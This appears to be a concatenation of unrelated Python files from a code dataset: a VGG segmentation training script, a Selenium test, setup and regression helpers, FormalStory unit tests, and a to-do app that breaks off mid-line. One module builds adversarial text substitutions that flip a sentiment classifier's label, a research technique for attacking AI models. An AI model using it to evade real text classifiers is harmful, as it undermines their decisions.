[\"/home/shared/datasets/kitti_road/data_road/training/gt_training.txt\"]\n filenames = [\"/home/luis2r/Desktop/cnn-for-curb-segmentation/vgg_depth/trainin_bev_kitti_car_people_bici.txt\"]\n #filenames_gt = [\"/home/luis2r/rob_devkit/depth/KITTI/kitti_train_depth_maps.txt\"}\n # data_folder = \"/home/shared/datasets/kitti_road/data_road/training\"\n # filenames = glob(os.path.join(data_folder, 'image_2', '*.png'))\n # filenames = tf.constant(filenames)\n # labels = glob(os.path.join(data_folder, 'gt_image_2', '*_road_*.png'))\n # labels = tf.constant(labels)\n # print(labels)\n\n ########################################################### random.shuffle(filenames)\n\n #tests.test_for_kitti_dataset(data_dir)\n\n # Download pretrained vgg model\n helper2_bev.maybe_download_pretrained_vgg(data_dir)\n\n #epochs = 50\n epochs= 50\n batch_size = 32\n num_shards = 12\n #seed = None\n\n\n\n\n #dataset = tf.data.Dataset.list_files(filenames).shuffle(num_shards)\n\n\n #dataset = dataset.interleave( lambda filename: (tf.data.TextLineDataset(filename) .skip(1) .map(lambda row: parse_csv(row, hparams), num_parallel_calls=multiprocessing.cpu_count())), cycle_length=5) \n\n #dataset = dataset.interleave( lambda filename: (tf.data.TextLineDataset(filename) .skip(1) .map(lambda filename: tuple(tf.py_func( _read_resize_py_function, [filename], [tf.double, tf.bool])), num_parallel_calls=multiprocessing.cpu_count())), cycle_length=5) \n\n\n #dataset = dataset.shuffle(buffer_size=10000, seed=20)\n\n\n #dataset = tf.data.TextLineDataset(filenames)\n #dataset = dataset.map(lambda filename: tuple(tf.py_func( _read_resize_py_function, [filename], [tf.double, tf.bool])))\n\n #batched_dataset = dataset.batch(batch_size)\n\n\n\n\n #dataset = tf.data.Dataset.from_tensor_slices((filenames, labels))\n #dataset = dataset.map(lambda filename, label: tuple(tf.py_func( _read_resize_py_function, [filename, label], [tf.double, tf.bool])))\n #dataset = dataset.shuffle(buffer_size=10000)\n #batched_dataset = dataset.batch(batch_size)\n #iterator = batched_dataset.make_one_shot_iterator()\n #iterator = batched_dataset.make_initializable_iterator()\n \n seed = tf.placeholder(tf.int64, shape=())\n\n iterator = input_pipeline(filenames, batch_size, num_shards, seed)\n\n with tf.Session() as sess:\n # Path to vgg model\n vgg_path = os.path.join(data_dir, 'vgg')\n # Create function to get batches\n\n #get_batches_fn = helper2.gen_batch_function(os.path.join(data_dir, 'data_road/training'), image_shape)\n\n\n\n # OPTIONAL: Augment Images for better results\n # https://datascience.stackexchange.com/questions/5224/how-to-prepare-augment-images-for-neural-network\n\n # TODO: Build NN using load_vgg, layers, and optimize function\n\n\n\n\n # TF placeholders\n correct_label = tf.placeholder(tf.int32, [None, None, None, num_classes], name='correct_label')\n learning_rate = tf.placeholder(tf.float32, name='learning_rate')\n\n input_image, keep_prob, vgg_layer3_out, vgg_layer4_out, vgg_layer7_out = load_vgg(sess, vgg_path)\n\n nn_last_layer = layers(vgg_layer3_out, vgg_layer4_out, vgg_layer7_out, num_classes)\n\n logits, train_op, cross_entropy_loss = optimize(nn_last_layer, correct_label, learning_rate, num_classes)\n\n # TODO: Train NN using the train_nn function\n\n #train_nn(sess, epochs, batch_size, get_batches_fn, train_op, cross_entropy_loss, input_image, correct_label, keep_prob, learning_rate)\n train_nn(sess, epochs, train_op, cross_entropy_loss, input_image, correct_label, keep_prob, learning_rate, iterator, seed)\n\n # TODO: Save inference data using helper2_bev_bev.save_inference_samples\n helper2_bev.save_inference_samples(runs_dir, data_dir, sess, image_shape, logits, keep_prob, input_image)\n\n # OPTIONAL: Apply the trained model to a video\n\n\nif __name__ == '__main__':\n run()\n","sub_path":"vgg_depth/main_bev.py","file_name":"main_bev.py","file_ext":"py","file_size_in_byte":27222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"52090515","text":"\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.select import Select\nfrom selenium.webdriver.support.wait import WebDriverWait\n\nfrom Utilites.BaseClass import BaseClass\n\n\nclass testone(BaseClass):\n\n def test_End2End(self):\n products = self.driver.find_elements_by_css_selector(\"div[class='card h-100']\")\n for product in products:\n Productname = product.find_element_by_xpath(\"div/h4/a\").text\n if Productname == \"Blackberry\":\n product.find_element_by_xpath(\"div/button\").click()\n\n self.driver.find_element_by_class_name(\"btn-primary\").click()\n self.driver.find_element_by_class_name(\"btn-success\").click()\n\n self.driver.find_element_by_id(\"country\").send_keys('ind')\n\n wait = WebDriverWait(self.driver, 7)\n wait.until(EC.presence_of_element_located((By.LINK_TEXT, \"India\")))\n self.driver.find_element_by_link_text(\"India\").click()\n\n self.driver.find_element_by_xpath(\"//div[@class='checkbox checkbox-primary']\").click()\n self.driver.find_element_by_css_selector(\"input[type='submit']\").click()\n\n textmessage = self.driver.find_element_by_css_selector(\".alert-success\").text\n\n assert \"Success!\" in textmessage\n\n self.driver.get_screenshot_as_file(\"abhishek.png\")\n","sub_path":"pythonProject/Frameworkdev/Tests/test_End2End.py","file_name":"test_End2End.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"414695017","text":"from pprint import pprint\n\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader, SequentialSampler, TensorDataset\n\nfrom model.tokenizer import get_filtered_k_phrases, filter_unwanted_phrases\n\ndef get_phrase_masked_list(text, sorted_phrase_offsets, sorted_n_words_in_phrase):\n \"\"\"retrieve phrase masked list.\n Args:\n text [str]: original text\n sorted_phrase_offsets List[tuple(start, end), ...]: sorted offsets by importance\n sorted_n_words_in_phrase List[int]: sorted number of words in phrases\n Returns:\n phrase_masked_list: len(phrase_masked_list) == len(sorted_n_words_in_phrase)\n for each phrase in the list, 1 < len(list_of_masked_text) < n_words_in_phrase\n \"\"\"\n phrase_masked_list = []\n # this triple for loop would be super slow\n # TODO: figure a way to optimize it\n for i, (n, (start, end)) in enumerate(zip(sorted_n_words_in_phrase, sorted_phrase_offsets)):\n phrase_masked_list.append([])\n for n_mask in range(1, n+1):\n # make sure there are spaces around it\n mask_text = f\" {' '.join(['[MASK]'] * n_mask)} \"\n phrase_masked_list[i].append(text[:start] + mask_text + text[end:])\n\n return phrase_masked_list\n\n\n# return units masked with UNK at each position in the sequence\ndef get_unk_masked(text, phrase_offsets, filtered_indices):\n masked_units = []\n for i in filtered_indices:\n start, end = phrase_offsets[i]\n masked_units.append(text[:start] + '[UNK]' + text[end:])\n # list of masked basic units\n return masked_units\n\n\ndef get_important_scores(\n masked_phrases,\n tokenizer,\n target_model,\n orig_label,\n max_prob,\n orig_probs,\n device,\n batch_size=1,\n max_length=512\n):\n \"\"\"compute importance scores based on the target model\n This function takes in the tokens from the original text, and the target model,\n and compute the difference with the original probs if each token is masked with [UNK].\n Args:\n text: the original text\n phrase_offsets: a list of tuples indicating the start and end of a phrase.\n filtered_indices: a list of indices \n tokenizer: a BERT tokenizer to be used with the target model.\n target_model: a fine-tuned BERT model for sentiment analysis.\n orig_label: the original label of the text.\n max_prob: the maximum probability from the original probability output.\n orig_probs: the set of original probability outputted from the target model.\n device: the device to move around the tensors and models.\n batch_size: the batch size of the input.\n max_length: the maximum length to keep in the original text.\n Returns:\n import_scores: a torch tensor with dim (len(masked_phrases),)\n \"\"\"\n\n encoded = tokenizer(masked_phrases,\n truncation=True,\n padding='max_length',\n max_length=max_length,\n return_token_type_ids=False,\n return_tensors=\"pt\")\n\n inputs = torch.cat([encoded['input_ids'].unsqueeze(0), encoded['attention_mask'].unsqueeze(0)]).to(device)\n inputs = inputs.permute(1, 0, 2).unsqueeze(2)\n leave_1_logits = [target_model(*data).logits for data in inputs]\n\n # turn into tensor\n leave_1_logits = torch.cat(leave_1_logits, dim=0)\n leave_1_probs = torch.softmax(leave_1_logits, dim=-1) # dim: (len(masked_phrases), num_of_classes)\n leave_1_labels = torch.argmax(leave_1_probs, dim=-1) # dim: len(masked_phrases)\n\n import_scores = (max_prob\n - leave_1_probs[:, orig_label] # how the probability of original label decreases\n +\n (leave_1_labels != orig_label).float() # new label not equal to original label\n *\n (leave_1_probs.max(dim=-1)[0] - torch.index_select(orig_probs, 0, leave_1_labels))\n ) # probability of changed label\n\n return import_scores, leave_1_labels\n\n\ndef get_substitutes(top_k_ids, tokenizer, mlm_model, device):\n \"\"\"get_substitutes find the set of substitution candidates using perplexity.\n Limitation: due to the lack of GPU memory, we set a threshold\n Args:\n top_k_ids: top k ids from the mlm model, tensor (1, n_masks, k)\n tokenizer: Bert Tokenizer\n mlm_model: mlm model\n device: where to transfer the data\n Returns:\n candidates_list: list of list of candidates ranked by perplexity\n \"\"\"\n # all substitutes list of list of token-id (all candidates)\n c_loss = nn.CrossEntropyLoss(reduction='none')\n\n # here we need to get permutation of top k ids\n # because we have no idea what combination fits the most\n\n # assuming first dimension is 1\n #top_k_ids = top_k_ids.squeeze()\n # print(top_k_ids)\n # https://stackoverflow.com/questions/1208118\n meshgrid = [tensor.unsqueeze(0) for tensor in torch.meshgrid(*top_k_ids)]\n ids_comb = torch.cat(meshgrid).T.reshape(-1, len(top_k_ids)).unique(dim=-1) \\\n if len(top_k_ids.shape) != 1 else top_k_ids.unsqueeze(0).T\n # print(ids_comb)\n # print(top_k_ids)\n # print(ids_comb)\n\n # set a threshold\n # TODO: we should select combinations instead of this simple cut\n ids_comb = ids_comb[:24]\n\n # compute perplexity\n N, L = ids_comb.size()\n logits = mlm_model(ids_comb)[0]\n ppl = c_loss(logits.view(N*L, -1), ids_comb.view(-1))\n ppl = torch.exp(torch.mean(ppl.view(N, L), dim=-1))\n\n # sort candidates\n sorted_indices = torch.argsort(ppl)\n sorted_token_ids_list = torch.index_select(ids_comb, 0, sorted_indices).tolist()\n tokens_list = [tokenizer.convert_ids_to_tokens(tokens) for tokens in sorted_token_ids_list]\n # necessary to remove subwords\n candidates_list = [[tokenizer.convert_tokens_to_string([token]) for token in tokens] for tokens in tokens_list]\n\n return candidates_list\n\ndef get_phrase_substitutes(input_ids, attention_mask, mask_token_index, stop_words, tokenizer, mlm_model, device, beam_width=10, K=6):\n # all substitutes list of list of token-id (all candidates)\n c_loss = nn.CrossEntropyLoss(reduction='none')\n\n word_positions = len(mask_token_index)\n query_num = 0\n \n masked_logits = mlm_model(input_ids, attention_mask).logits\n query_num += len(input_ids)\n \n masked_logits = torch.index_select(masked_logits, 1, mask_token_index[0])\n \n # top_ids has a beam_width number of word combinations with smallest perplexities\n # the initial candidates are the beam_width number of words with the highest logits\n top_ids = torch.topk(masked_logits, K, dim=-1).indices[0]\n\n #_, sorted_ids = torch.sort(masked_logits[0,0], dim=-1, descending=True)\n #filtered_ids = get_filtered_k_phrases(sorted_ids, tokenizer, stop_words, K)\n\n #initialize candidates pool with the top k candidates at the first position\n candidate_ids = top_ids.T.to(device)\n \n for p in range(1, word_positions):\n new_inputs = input_ids.repeat(len(candidate_ids), 1)\n new_inputs[:, mask_token_index[:p]] = candidate_ids\n \n masked_logits = mlm_model(new_inputs, attention_mask).logits\n masked_logits = torch.index_select(masked_logits, 1, mask_token_index[p])\n query_num += len(new_inputs)\n \n top_ids = torch.topk(masked_logits, beam_width, dim=-1).indices\n \n repeated_cands = candidate_ids.unsqueeze(1).repeat(1, beam_width, 1).reshape(-1,p)\n repeated_new_cands = top_ids.squeeze().reshape(-1, 1)\n \n # cur_options = (beam_width, beam_width)\n cur_options = torch.cat((repeated_cands, repeated_new_cands), 1)\n \n N, L = cur_options.size()\n logits = mlm_model(cur_options)[0]\n query_num += len(cur_options)\n\n ppl = c_loss(logits.view(N*L, -1), cur_options.view(-1))\n ppl = torch.exp(torch.mean(ppl.view(N, L), dim=-1))\n\n # the smaller the perplexity, the more coherent the sequence is\n sorted_indices = torch.argsort(ppl)[:K]\n candidate_ids = torch.index_select(cur_options, 0, sorted_indices)\n \n sorted_token_ids_list = candidate_ids.tolist()\n tokens_list = [tokenizer.convert_ids_to_tokens(tokens) for tokens in sorted_token_ids_list]\n \n # necessary step to remove subwords\n candidates_list = [[tokenizer.convert_tokens_to_string([token]) for token in tokens] for tokens in tokens_list]\n \n \n return candidates_list, query_num\n\ndef get_word_substitutes(input_ids, attention_mask, mask_token_index, tokenizer, mlm_model, K=8, threshold=3.0):\n masked_logits = mlm_model(input_ids, attention_mask).logits\n masked_logits = torch.index_select(masked_logits, 1, mask_token_index)\n \n top_k_ids = torch.topk(masked_logits, K, dim=-1).indices[0]\n #print(masked_logits.shape)\n #print(top_k_ids.shape)\n #print(mask_token_index)\n substitute_scores = masked_logits[0,0][top_k_ids][0]\n substitute_ids = top_k_ids[0]\n \n words = []\n for (i, score) in zip(substitute_ids, substitute_scores):\n if threshold != 0 and score < threshold:\n break\n words.append([tokenizer._convert_id_to_token(int(i))])\n \n return words\n","sub_path":"model/substitution.py","file_name":"substitution.py","file_ext":"py","file_size_in_byte":8847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"421680653","text":"\r\nfrom setuptools import setup, find_packages\r\n\r\nprint(find_packages())\r\nsource_packages = [\t\"vtandem\", \\\r\n\t\t\t\t\t\"vtandem.dft\", \\\r\n\t\t\t\t\t\"vtandem.visualization\", \\\r\n\t\t\t\t\t\"vtandem.visualization.quaternary\", \\\r\n\t\t\t\t\t\"vtandem.visualization.quaternary.quaternary_scripts\", \\\r\n\t\t\t\t\t\"vtandem.visualization.ternary\", \\\r\n\t\t\t\t\t\"vtandem.visualization.ternary.ternary_scripts\"\r\n\t\t\t\t\t]\r\nsource_image_files = [ \t(\"logo\", (\"logo/LogoLong.png\", \"logo/LogoSmall.png\")),\r\n\t\t\t\t\t\t(\"icon\", (\"icon/FolderBrowserIcon.png\", \"icon/QuestionIcon.png\"))\r\n\t\t\t\t\t\t]\r\n\r\nsetup(\r\n\tname = \"vtandem\",\r\n\tversion = \"2019.07.24\",\r\n\tdescription = \"\",\r\n\tauthor = \"Michael Y. Toriyama, Jiaxing Qu, Lidia C. Gomes, Elif Ertekin\",\r\n\tauthor_email = \"mathtoriyama@gmail.com\",\r\n\turl = \"\",\r\n\tpackages = source_packages,\r\n\tdata_files = source_image_files,\r\n\tpy_modules = [\"vtandem\"],\r\n\tentry_points = {\r\n\t\t\"console_scripts\": [\r\n\t\t\t\"vtandem = vtandem.vtandem:vtandem\"\r\n\t\t]\r\n\t},\r\n)\r\n\r\n\r\n\r\n\r\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"562328590","text":"from sklearn import linear_model\nimport pandas as pd\nimport sys\nsys.path.append('../')\nfrom lib.prediction import show_trajectories\nfrom matplotlib import pyplot as plt\nfrom sklearn.model_selection import train_test_split\n\ndef learn_and_show_no_test(regressor_x, regressor_y, data_to_learn, trajectory):\n \"\"\"\n\n :param regressor_x: regressor for x coordinate\n :param regressor_y: regressor for y coordinate\n :param data_to_learn: df with some data to learn\n :param trajectory: column with lables to learn\n :return: predicted trajectory\n \"\"\"\n regressor_x.fit(data_to_learn, trajectory.x)\n regressor_y.fit(data_to_learn, trajectory.y)\n # making prredictions\n predictions_x = regressor_x.predict(data_to_learn)\n predictions_y = regressor_y.predict(data_to_learn)\n\n # creating data_output to pass to plotter and scorer\n d = {'x': predictions_x,\n 'y': predictions_y,\n 'tmsp': data_to_learn.tmsp.values.tolist()\n }\n trajectory_pred = pd.DataFrame(data=d)\n\n # the plotter given by authors can't deal with shuffled data\n _ = plt.plot(trajectory.x.values, trajectory.y.values, c='blue', label='Trajectory')\n _ = plt.plot(trajectory_pred.x.values, trajectory_pred.y.values, c='red', label='Predicted')\n legend = plt.legend(shadow=True, fontsize='medium', loc='upper right')\n plt.title('predicted and test trajectorys')\n plt.xlabel('x')\n plt.ylabel('y')\n plt.show()\n\n # if we are working with linear regressor from sklearn lwe are to look at coefficients\n if str(type(regressor_x)) == \"\":\n print('x_predictor:')\n for pair in zip(data_to_learn.columns, regressor_x.coef_):\n print(pair)\n\n print('y_predictor:')\n for pair in zip(data_to_learn.columns, regressor_y.coef_):\n print(pair)\n\n figure, scores = show_trajectories(trajectory, trajectory_pred)\n print(scores)\n\n return trajectory_pred\n\n\ndef learn_test_train(predictor_x, predictor_y, shuffle, test_size, data_to_learn, trajectory):\n \"\"\"\n the function learn given predictors on data_to_learn. to make tests we use sklearn test_train_split\n and test_size and Shuffle are to be given\n :param predictor_x: regressor for x coordinate\n :param predictor_y: regressor for y coordinate\n :param shuffle: should we shuffle the test? (True/False)\n :param test_size: test size from [0, 1]\n :param data_to_learn: df with some data to learn\n :param trajectory: column with lables to learn\n :return:\n \"\"\"\n (X_train,\n X_test,\n x_train, x_test) = train_test_split(data_to_learn, trajectory.x,\n test_size=test_size,\n random_state=0,\n shuffle=shuffle\n )\n (Y_train,\n Y_test,\n y_train, y_test) = train_test_split(data_to_learn, trajectory.y,\n test_size=test_size,\n random_state=0,\n shuffle=shuffle\n )\n\n predictor_x.fit(X_train, x_train)\n predictor_y.fit(Y_train, y_train)\n\n predictions_x = predictor_x.predict(X_test)\n predictions_y = predictor_y.predict(Y_test)\n\n # creating data_output to pass to plotter and scorer\n d = {'x': predictions_x,\n 'y': predictions_y,\n 'tmsp': Y_test.tmsp.values.tolist()\n }\n trajectory_pred = pd.DataFrame(data=d)\n\n d = {'x': x_test,\n 'y': y_test,\n 'tmsp': Y_test.tmsp.values.tolist()\n }\n trajectory_test = pd.DataFrame(data=d)\n\n # the plotter given by authors can't deal with shuffled data\n if str(type(predictor_x)) == \"\":\n print('x_predictor:')\n for pair in zip(data_to_learn.columns, predictor_x.coef_):\n print(pair)\n\n print('y_predictor:')\n for pair in zip(data_to_learn.columns, predictor_y.coef_):\n print(pair)\n # the plotter given by authors can't deal with shuffled data\n _ = plt.scatter(x_test, y_test, s=0.5, c='blue', label='Test')\n _ = plt.scatter(trajectory_pred.x.values, trajectory_pred.y.values, s=1, c='red', label='Predicted')\n legend = plt.legend(shadow=True, fontsize='medium', loc='upper right')\n plt.title('test and predicted trajectory')\n plt.xlabel('x')\n plt.ylabel('y')\n plt.show()\n\n _ = plt.scatter(x_train, y_train, s=1, c='red', label='Train')\n _ = plt.scatter(trajectory_pred.x.values, trajectory_pred.y.values, s=1, c='green', label='Predicted')\n legend = plt.legend(shadow=True, fontsize='medium', loc='upper right')\n plt.title('train and predicted trajectory')\n plt.xlabel('x')\n plt.ylabel('y')\n plt.show()\n\n figure, scores = show_trajectories(trajectory_test, trajectory_pred)\n print(scores)\n\n","sub_path":"trajectory_prediction/lib/learning_and_testing.py","file_name":"learning_and_testing.py","file_ext":"py","file_size_in_byte":4996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"583188772","text":"\"\"\"This module tests logic for the FormalStory clas.\"\"\"\nimport unittest\nfrom ..formal_story import FormalStory\nfrom .. import load_from\n\n\nclass FormalStoryTests(unittest.TestCase):\n \"\"\"Test cases for the FormalStory class.\"\"\"\n\n # MARK: FormalStory.__init__()\n\n def test_000_000_ShouldCreateInstanceOfFormalStory(self):\n story = FormalStory()\n self.assertTrue(type(story) is FormalStory)\n\n # MARK: (FormalStory).role\n\n def test_100_000_ShouldHaveNilRoleProperty(self):\n story = FormalStory()\n self.assertIsNone(story.role)\n\n def test_100_010_ShouldSetAndReturnRolePropertyAsString(self):\n story = FormalStory()\n arb_role = 'some arbitrary role'\n story.role = arb_role\n self.assertEqual(story.role, arb_role)\n\n def test_100_020_ShouldRaiseErrorOnSetRoleToWrongType(self):\n story = FormalStory()\n with self.assertRaises(ValueError):\n story.role = 56\n\n # MARK: (FormalStory).means\n\n def test_200_000_ShouldHaveNilMeansProperty(self):\n story = FormalStory()\n self.assertIsNone(story.means)\n\n def test_200_010_ShouldSetAndReturnMeansPropertyAsString(self):\n story = FormalStory()\n arb_means = 'some arbitrary means'\n story.means = arb_means\n self.assertEqual(story.means, arb_means)\n\n def test_200_020_ShouldRaiseErrorOnSetMeansToWrongType(self):\n story = FormalStory()\n with self.assertRaises(ValueError):\n story.means = 56\n\n # MARK: (FormalStory).ends\n\n def test_300_000_ShouldHaveNilEndsProperty(self):\n story = FormalStory()\n self.assertIsNone(story.ends)\n\n def test_300_010_ShouldSetAndReturnEndsPropertyAsList(self):\n story = FormalStory()\n arb_ends = ['can eat popcorn', 'can continue to live']\n story.ends = arb_ends\n self.assertEqual(story.ends, arb_ends)\n\n def test_300_020_ShouldRaiseErrorOnSetEndsToWrongType(self):\n story = FormalStory()\n with self.assertRaises(ValueError):\n story.ends = 56\n\n # MARK: (FormalStory).confirmations\n\n def test_400_000_ShouldHaveNilConfirmationsProperty(self):\n story = FormalStory()\n self.assertIsNone(story.confirmations)\n\n def test_400_010_ShouldSetAndReturnConfirmationsPropertyAsList(self):\n story = FormalStory()\n arb_confirmations = ['yes', 'yee', 'yep']\n story.confirmations = arb_confirmations\n self.assertEqual(story.confirmations, arb_confirmations)\n\n def test_400_020_ShouldRaiseErrorOnSetConfirmationsToWrongType(self):\n story = FormalStory()\n with self.assertRaises(ValueError):\n story.confirmations = 56\n\n # MARK: (FormalStory).__repr__()\n\n def test_500_000_ShouldReturnStringOfEmptyStory(self):\n story = FormalStory()\n expected = \"\"\"FormalStory:\nAs a ___, I want ___\"\"\"\n self.assertEqual(expected, str(story))\n\n def test_500_010_ShouldReturnStringOfStoryWithId(self):\n story = FormalStory()\n story.id = 'S000'\n expected = \"\"\"FormalStory:\nid: S000\nAs a ___, I want ___\"\"\"\n self.assertEqual(expected, str(story))\n\n def test_500_020_ShouldReturnStringOfStoryWithEverythingFromSuper(self):\n story = FormalStory()\n story.id = 'S000'\n story.name = 'StoryName'\n story.priority = 10\n story.estimated_hours = 5.5\n story.tags = ['basic', 'standard', 'testing']\n expected = \"\"\"FormalStory:\nid: S000\nname: StoryName\ntags: ['basic', 'standard', 'testing']\npriority: 10\nest. time (h): 5.5\nAs a ___, I want ___\"\"\"\n self.assertEqual(expected, str(story))\n\n def test_500_030_ShouldReturnStringOfStoryWithEverything(self):\n story = FormalStory()\n story.id = 'S000'\n story.name = 'StoryName'\n story.priority = 10\n story.estimated_hours = 5.5\n story.tags = ['basic', 'standard', 'testing']\n story.role = 'User'\n story.means = 'to create stories'\n story.ends = ['organize', 'manage', 'test', 'archive']\n story.confirmations = ['its awesome']\n expected = \"\"\"FormalStory:\nid: S000\nname: StoryName\ntags: ['basic', 'standard', 'testing']\npriority: 10\nest. time (h): 5.5\nAs a User, I want to create stories so that I can:\n* organize\n* manage\n* test\n* archive\nconfirmations:\n* its awesome\"\"\"\n self.assertEqual(expected, str(story))\n\n def test_500_040_ShouldReturnStringOfStoryWithoutEnds(self):\n story = FormalStory()\n story.id = 'S000'\n story.name = 'StoryName'\n story.priority = 10\n story.estimated_hours = 5.5\n story.tags = ['basic', 'standard', 'testing']\n story.role = 'User'\n story.means = 'to create stories'\n story.confirmations = ['its awesome']\n expected = \"\"\"FormalStory:\nid: S000\nname: StoryName\ntags: ['basic', 'standard', 'testing']\npriority: 10\nest. time (h): 5.5\nAs a User, I want to create stories\nconfirmations:\n* its awesome\"\"\"\n self.assertEqual(expected, str(story))\n\n # MARK: (FormalStory).as_dict\n\n def test_600_000_ShouldReturnEmptyDict(self):\n story = FormalStory()\n self.assertEqual({}, story.as_dict)\n\n def test_600_010_ShouldReturnDictWithIDAndName(self):\n story = FormalStory()\n story.id = 'i'\n story.name = 'n'\n self.assertEqual({'_id': 'i', '_name': 'n'}, story.as_dict)\n\n def test_600_020_ShouldReturnDictWithSubStory(self):\n story = FormalStory()\n sub = FormalStory()\n sub.id = 'i'\n story.sub_stories = [sub]\n expected = {\n '_sub_stories': {\n \"FormalStory\": [\n {'_id': 'i'}\n ]\n }\n }\n self.assertEqual(expected, story.as_dict)\n\n def test_600_030_ShouldReturnDictWithSubSubStory(self):\n story = FormalStory()\n sub = FormalStory()\n sub.id = 'i1'\n story.sub_stories = [sub]\n subsub = FormalStory()\n subsub.id = 'i2'\n sub.sub_stories = [subsub]\n\n expected = {\n '_sub_stories': {\n \"FormalStory\": [\n {\n '_id': 'i1',\n '_sub_stories': {\n \"FormalStory\": [\n {'_id': 'i2'}\n ]\n }\n }\n ]\n }\n }\n self.assertEqual(expected, story.as_dict)\n\n # MARK: load_from\n\n def test_700_000_ShouldLoadFromEmptyDict(self):\n story = load_from('FormalStory', {})\n self.assertEqual({}, story.as_dict)\n\n def test_700_010_ShouldLoadFromDictWithIDAndName(self):\n serial_dict = {'_id': 'i', '_name': 'n'}\n story = load_from('FormalStory', serial_dict)\n self.assertEqual(serial_dict, story.as_dict)\n\n def test_700_020_ShouldLoadFromDictWithSubStory(self):\n serial_dict = {\n '_sub_stories': {\n \"FormalStory\": [\n {'_id': 'i'}\n ]\n }\n }\n story = load_from('FormalStory', serial_dict)\n self.assertEqual(serial_dict, story.as_dict)\n self.assertEqual('i', story.sub_stories[0].id)\n self.assertEqual('FormalStory', type(story.sub_stories[0]).__name__)\n\n def test_700_030_ShouldLoadFromDictWithSubSubStory(self):\n serial_dict = {\n '_sub_stories': {\n \"FormalStory\": [\n {\n '_id': 'i1',\n '_sub_stories': {\n \"FormalStory\": [\n {'_id': 'i2'}\n ]\n }\n }\n ]\n }\n }\n story = load_from('FormalStory', serial_dict)\n self.assertEqual(serial_dict, story.as_dict)\n self.assertEqual('i1', story.sub_stories[0].id)\n self.assertEqual('FormalStory', type(story.sub_stories[0]).__name__)\n self.assertEqual('i2', story.sub_stories[0].sub_stories[0].id)\n self.assertEqual('FormalStory',\n type(story.sub_stories[0].sub_stories[0]).__name__)\n self.assertEqual(serial_dict, story.as_dict)\n","sub_path":"src/model/stories/tests/test_formal_story.py","file_name":"test_formal_story.py","file_ext":"py","file_size_in_byte":8405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"447273364","text":"from tkinter import *\r\nfrom tkinter.font import Font\r\nfrom tkinter import filedialog\r\nimport pickle\r\n\r\nroot = Tk()\r\nroot.title('To Do List!')\r\nroot.iconbitmap(\"F:/Python/To_Do/icons/ico.ico\")\r\nroot.geometry(\"550x500+650+250\")\r\n\r\n# Шрифт\r\nmy_font = Font(\r\n family=\"Gabriola\",\r\n size=25,\r\n weight=\"bold\")\r\n\r\n# Создаем рамку\r\nmy_frame = Frame(root)\r\nmy_frame.pack(pady=10)\r\n\r\n# Создаем список\r\nmy_list = Listbox(my_frame,\r\n font=my_font,\r\n width=38,\r\n height=5,\r\n bg=\"SystemButtonFace\",\r\n bd=0,\r\n fg=\"#464646\",\r\n highlightthickness=0,\r\n selectbackground=\"#a6a6a6\",\r\n activestyle=\"none\")\r\n\r\nmy_list.pack(side=LEFT, fill=BOTH)\r\n\r\nstuff = [\"Список дел\", \"Сходить в магазин\", \"Выпить витамины\"]\r\n\r\nfor item in stuff:\r\n my_list.insert(END, item)\r\n\r\n# Создаем колесо прокрутки\r\nmy_scrollbar = Scrollbar(my_frame)\r\nmy_scrollbar.pack(side=RIGHT, fill=Y)\r\n\r\n# Добавляем прокрутку\r\nmy_list.config(yscrollcommand=my_scrollbar.set)\r\nmy_scrollbar.config(command=my_list.yview)\r\n\r\n# Создаем поле ввода\r\nmy_entry = Entry(root, font=(\"Helvetica\", 24))\r\nmy_entry.pack(pady=20)\r\n\r\n# Создаем кнопки и рамки\r\nbutton_frame = Frame(root)\r\nbutton_frame.pack(pady=20)\r\n\r\n# Функции\r\ndef add_item():\r\n my_list.insert(END, my_entry.get())\r\n my_entry.delete(0, END)\r\n\r\ndef delete_item():\r\n my_list.delete(ANCHOR)\r\n\r\ndef cross_off_item():\r\n my_list.itemconfig(\r\n my_list.curselection(),\r\n fg=\"#dedede\")\r\n my_list.select_clear(0, END)\r\n\r\ndef uncross_item():\r\n my_list.itemconfig(\r\n my_list.curselection(),\r\n fg=\"#464646\")\r\n my_list.select_clear(0, END)\r\n\r\ndef delete_crossed():\r\n count = 0\r\n while count < my_list.size():\r\n if my_list.itemcget(count, \"fg\") == \"#dedede\":\r\n my_list.delete(my_list.index(count))\r\n else:\r\n count += 1\r\n\r\ndef save_list():\r\n file_name = filedialog.asksaveasfilename(\r\n initialdir=\"F:/Python/To_Do/data\",\r\n title=\"Save File\",\r\n filetypes=(\r\n (\"Dat Files\", \"*.dat\"),\r\n (\"All Files\", \"*.*\"))\r\n )\r\n if file_name:\r\n if file_name.endswith(\".dat\"):\r\n pass\r\n else:\r\n file_name = f'{file_name}.dat'\r\n\r\n # Удаление пунктов перед сохранением\r\n count = 0\r\n while count < my_list.size():\r\n if my_list.itemcget(count, \"fg\") == \"#dedede\":\r\n my_list.delete(my_list.index(count))\r\n else:\r\n count += 1\r\n\r\n # выбор всех пунктов из списка\r\n stuff = my_list.get(0, END)\r\n\r\n # Открыть файл\r\n output_file = open(file_name, 'wb')\r\n\r\n pickle.dump(stuff, output_file)\r\n\r\ndef open_list():\r\n file_name = filedialog.askopenfilename(\r\n initialdir=\"F:/Python/To_Do/data\",\r\n title=\"Save File\",\r\n filetypes=(\r\n (\"Dat Files\", \"*.dat\"),\r\n (\"All Files\", \"*.*\"))\r\n )\r\n if file_name:\r\n my_list.delete(0, END)\r\n\r\n input_file = open(file_name, 'rb')\r\n\r\n stuff = pickle.load(input_file)\r\n\r\n for item in stuff:\r\n my_list.insert(END, item)\r\n\r\ndef delete_list():\r\n my_list.delete(0 ,END)\r\n\r\n# Создаем меню\r\nmy_menu = Menu(root)\r\nroot.config(menu=my_menu)\r\n\r\n# Добавляем элементы в меню\r\nfile_menu = Menu(my_menu, 